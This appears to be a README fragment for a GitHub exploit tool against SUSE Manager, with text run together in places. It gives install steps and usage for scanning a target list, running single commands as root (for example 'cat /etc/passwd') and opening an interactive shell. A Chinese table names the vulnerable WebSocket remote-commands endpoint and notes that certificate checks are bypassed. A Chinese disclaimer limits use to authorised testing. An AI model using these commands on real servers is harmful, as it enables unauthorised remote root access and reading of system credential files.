git clone https://github.com/yourusername/suse-manager-exploit.git
cd suse-manager-exploit
pip install -r requirements.txtpython3 exploit.py scan -i targets.txt -o vulnerable.txt --debug# Single command python3 exploit.py exploit 10.0.0.5 -c "cat /etc/passwd"Interactive shell
python3 exploit.py exploit vulnerable.com --debug
本工具仅用于授权的渗透测试和教育目的。在未经事先许可的情况下对系统使用本工具是违法的。
MIT - 版权所有 (c) 2023
| 组件 | 描述 |
|---|---|
| WebSocket 端点 | /rhn/websocket/minion/remote-commands |
| 漏洞检测 | 通过 id 验证 root 命令执行 |
| SSL 处理 | 绕过证书验证 |